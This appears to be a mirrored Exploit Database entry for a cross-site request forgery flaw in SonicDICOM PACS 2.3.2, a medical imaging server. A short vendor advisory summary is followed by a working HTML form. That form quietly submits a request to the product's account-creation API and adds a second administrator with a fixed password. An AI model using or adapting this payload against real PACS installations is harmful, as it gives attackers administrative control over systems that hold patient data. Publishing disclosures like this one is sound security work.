SonicDICOM PACS 2.3.2 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 12 阅读

• 作者： LiquidWorm
  日期： 2017-02-11
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41310/

• SonicDICOM PACS 2.3.2 CSRF Add Admin Exploit
  
  
  Vendor: JIUN Corporation
  Product web page: https://www.sonicdicom.com
  Affected version: 2.3.2 and 2.3.1
  
  Summary: SonicDICOM is PACS software that combines the capabilities of
  DICOM Server with web browser based DICOM Viewer.
  
  Desc: The application interface allows users to perform certain actions
  via HTTP requests without performing any validity checks to verify the
  requests. This can be exploited to perform certain actions with administrative
  privileges if a logged-in user visits a malicious web site.
  
  Tested on: Microsoft-HTTPAPI/2.0
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2017-5395
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5395.php
  
  22.11.2016
  
  --
  
  
  <html>
  <body>
  <form action="http://172.19.0.214/viewer/api/accounts/create" method="POST">
  <input type="hidden" name="Id" value="testingus" />
  <input type="hidden" name="Name" value="Second Admin" />
  <input type="hidden" name="Authority" value=“1” />
  <input type="hidden" name="Password" value="654321" />
  <input type="submit" value="Request" />
  </form>
  </body>
  </html>